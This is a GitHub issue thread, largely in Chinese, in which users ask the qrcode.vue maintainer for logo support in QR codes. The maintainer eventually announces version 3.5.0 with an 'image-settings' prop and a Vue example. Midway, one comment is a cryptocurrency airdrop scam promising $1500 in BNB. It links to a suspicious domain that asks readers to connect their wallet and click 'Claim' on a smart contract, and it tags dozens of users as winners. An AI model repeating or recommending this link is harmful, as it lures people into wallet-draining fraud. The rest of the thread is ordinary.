### ISSUE TITLE
什么时候支持带logo?

### ISSUE THREAD

**Issue by QQ254708913** [scopewu/qrcode.vue#47]
什么时候支持生成的二维码可以带logo?

**Comment by scopewu** [comment]
下一版将会支持，可能是本周末有空的时候（11 月 13 ~ 4 号）

**Comment by itliuwk** [comment]
1.x还维护嘛  加上 logo 功能？

**Comment by scopewu** [comment]
Hi @itliuwk,
最近都比较忙，没什么时间，如果晚上有空的话会尝试，毕竟有许多小伙伴提出要求。

**Comment by vesper8** [comment]
I too would really like to have a logo option to be centered in the middle of the QR. Any chance you will have time to add this soon?

Many thanks

**Comment by subhod-i** [comment]
This feature would be much helpful.

**Comment by scopewu** [comment]
I'm sorry, I've been very frustrated recently due to China's coronavirus lockdown policy. Next, I will give priority to support.

**Comment by Liquidream** [comment]
I too would really like to include a logo (if possible), thx!

**Comment by LucasBois1** [comment]
I recommend this one -> [Awesome-QR.js](https://github.com/SumiMakito/Awesome-qr.js)

**Comment by zhu-hong** [comment]
我不建议加上这个功能，只提供通用的生成纯二维码的功能即可，这种个性需求自己项目里做，吃力不讨好，因为添加logo很大可能导致无法扫码，到时又说是库的问题
[影响二维码扫描的因素](https://cli.im/article/detail/1987)

**Comment by mauriciabad** [comment]
Hi I would love to have this feature. Any updates on it? :D

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @xfo, @h-fathi, @LeeRayno, @Portaecha168, @Majchrzak, @kayeah82, @weixiaojian001, @charleshm, @mehmetcanbudak, @nbbug, @lllfx, @jiechengyang, @mengxk, @DuncanT2000, @HansSchouten, @kajiecy, @chenbowu, @zhuzhenping, @neodes-h, @WinstonYa, @HuangWeiqin, @jiangming96, @nxdong, @wayonEmes, @shirdey, @novecento, @CNFeffery, @hojjatsok, @zhanglijie5997, @yufan2014, @loongcoder, @decebals, @zkbhj, @yehuozhili, @sklarsa, @daweilv, @flower98, @JadenZhong, @zagwi, @Xiaotian13, @yjfhtop, @maksabuzyarov, @nikepan, @wisarmy, @YoKung, @RodeRickIsWatching, @Klein-six, @yutiansut, @gslvly, @zzc1131554513

**Comment by nangazaki** [comment]
Hi... I would like to have this feature. Any updates?

**Comment by cvpv** [comment]
三年过去了~

**Comment by scopewu** [comment]
> 三年过去了~

@cvpv 是的呢，甚至熬到 `vue 2.x` 生命周期末尾。由于 22 年的上海封城和一些个人原因，我自身已经接近两年没有参与工作，无收入躺平两年。年前终于开始开发支持 `svg` 准备年后支持 `canvas`，目前 `LOGO` 支持与 `margin` 属性冲突， 尽快完成工作吧。也准备在今年开始找工作，可能会慢一些，但会结束。

**Comment by wordscode** [comment]
> > 三年过去了~
> 
> @cvpv 是的呢，甚至熬到 `vue 2.x` 生命周期末尾。由于 22 年的上海封城和一些个人原因，我自身已经接近两年没有参与工作，无收入躺平两年。年前终于开始开发支持 `svg` 准备年后支持 `canvas`，目前 `LOGO` 支持与 `margin` 属性冲突， 尽快完成工作吧。也准备在今年开始找工作，可能会慢一些，但会结束。

加油啊   :)

**Comment by Flipped199** [comment]
> > 三年过去了~
> 
> @cvpv 是的呢，甚至熬到 `vue 2.x` 生命周期末尾。由于 22 年的上海封城和一些个人原因，我自身已经接近两年没有参与工作，无收入躺平两年。年前终于开始开发支持 `svg` 准备年后支持 `canvas`，目前 `LOGO` 支持与 `margin` 属性冲突， 尽快完成工作吧。也准备在今年开始找工作，可能会慢一些，但会结束。

加油呀

**Comment by xiangshu233** [comment]
还没有支持logo嘛，三年了

**Comment by scopewu** [comment]
😾 NOW, RELEASE new `3.5.0` for support this via a new prop `image-settings`.

The full props example:
```vue
<template>
  <qrcode-vue
    :value="value"
    :level="level"
    :render-as="renderAs"
    :background="background"
    :foreground='foreground'
    :image-settings='imageSettings'
  />
</template>
<script setup lang="ts">
  import { ref } from 'vue'
  import QrcodeVue from 'qrcode.vue'
  import type { Level, RenderAs, ImageSettings } from 'qrcode.vue'

  const value = ref('qrcode')
  const level = ref<Level>('M')
  const renderAs = ref<RenderAs>('svg')
  const background = ref('#ffffff')
  const foreground = ref('#000000')
  const margin = ref(0)
  const imageSettings = ref<ImageSettings>({
    src: 'https://github.com/scopewu.png',
    width: 30,
    height: 30,
    // x: 10,
    // y: 10,
    excavate: true,
  })
</script>
```
If have any questions, please tell me.
This issue will be closed.
